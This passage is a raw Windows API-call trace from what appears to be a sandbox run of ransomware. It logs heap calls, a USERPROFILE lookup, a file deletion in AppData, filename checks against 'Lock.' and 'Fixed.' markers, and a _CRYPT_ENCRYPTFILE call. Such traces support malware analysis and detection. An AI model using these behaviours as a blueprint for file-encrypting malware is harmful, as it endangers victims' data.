lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0229.938] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0229.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.938] FreeLibrary (hLibModule=0x756e0000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0229.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0229.939] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.939] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0229.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0229.939] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0229.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0229.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0229.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0229.940] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0229.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.940] CloseHandle (hObject=0x2d0) returned 1 [0229.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0229.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0229.940] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0dd0 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0230.015] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0230.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0230.016] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0230.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0230.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0230.017] CloseHandle (hObject=0x2a0) returned 1 [0230.019] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0230.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0230.020] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0230.020] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.021] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/eeVXHty18.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3", lpFilePart=0x8cedf4*="eeVXHty18.mp3") returned 0x2d [0230.021] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eevxhty18.mp3")) returned 0x20 [0230.021] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527619d0, ftCreationTime.dwHighDateTime=0x1d5ea81, ftLastAccessTime.dwLowDateTime=0x7f6ccad0, ftLastAccessTime.dwHighDateTime=0x1d5e1c9, ftLastWriteTime.dwLowDateTime=0x7f6ccad0, ftLastWriteTime.dwHighDateTime=0x1d5e1c9, nFileSizeHigh=0x0, nFileSizeLow=0x2479, dwReserved0=0x1, dwReserved1=0x1c, cFileName="eeVXHty18.mp3", cAlternateFileName="EEVXHT~1.MP3")) returned 0xa87510 [0230.021] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eevxhty18.mp3")) returned 1 [0230.072] FindNextFileW (in: hFindFile=0xa87510, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527619d0, ftCreationTime.dwHighDateTime=0x1d5ea81, ftLastAccessTime.dwLowDateTime=0x7f6ccad0, ftLastAccessTime.dwHighDateTime=0x1d5e1c9, ftLastWriteTime.dwLowDateTime=0x7f6ccad0, ftLastWriteTime.dwHighDateTime=0x1d5e1c9, nFileSizeHigh=0x0, nFileSizeLow=0x2479, dwReserved0=0x1, dwReserved1=0x1c, cFileName="eeVXHty18.mp3", cAlternateFileName="EEVXHT~1.MP3")) returned 0 [0230.073] FindClose (in: hFindFile=0xa87510 | out: hFindFile=0xa87510) returned 1 [0230.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0230.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0230.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0230.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.073] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0230.073] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0230.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0230.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e564e0 [0230.074] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/eeVXHty18.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3", lpFilePart=0x8cf650*="eeVXHty18.mp3") returned 0x2d [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0230.074] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\eeVXHty18.mp3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\eevxhty18.mp3")) returned 0xffffffff [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0230.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0230.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.075] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0230.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQBMxAkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QBMxAkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMxAkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MxAkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xAkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kSv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sv-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0230.075] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0230.076] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0230.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0230.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0230.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1e) returned 0x2e79338 [0230.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQBMxAkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QBMxAkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMxAkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MxAkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xAkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AkSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kSv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sv-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v-.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0230.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0230.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8f0 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0230.078] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0230.078] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0230.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0230.078] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0230.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 